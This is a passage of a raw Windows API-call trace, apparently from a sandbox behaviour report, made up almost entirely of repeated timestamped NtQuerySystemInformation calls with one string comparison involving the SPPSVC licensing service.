(SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0280.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x58, ResultLength=0x0) [0280.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0280.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0280.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0280.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0280.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0280.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x28, ResultLength=0x0) [0280.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0280.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0280.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0280.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0280.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0280.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0280.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7a0, Length=0x20, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc820, Length=0x20, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc820, Length=0x20, ResultLength=0x0) [0280.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd88, Length=0x50, ResultLength=0x0) [0280.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x38, ResultLength=0x0) [0280.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0280.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0280.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0280.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0280.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0280.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x38, ResultLength=0x0) [0280.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x28, ResultLength=0x0) [0280.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x28, ResultLength=0x0) [0280.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x38, ResultLength=0x0) [0280.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x20, ResultLength=0x0) [0280.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0280.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0280.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0280.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x38, ResultLength=0x0) [0280.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x20, ResultLength=0x0) [0280.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0280.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0280.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0280.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0280.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0280.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0280.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0280.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0280.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x28, ResultLength=0x0) [0280.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0280.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0280.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x20, ResultLength=0x0) [0280.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0280.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0280.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0280.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0280.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x20, ResultLength=0x0) [0280.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0280.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0280.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.508] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc18, Length=0x50, ResultLength=0x0) [0280.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x38, ResultLength=0x0) [0280.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0280.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0280.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0280.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0280.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x38, ResultLength=0x0) [0280.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0280.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0280.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x38, ResultLength=0x0) [0280.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0280.516] NtQuerySystemInformation (SystemInformationClass=0xb9, 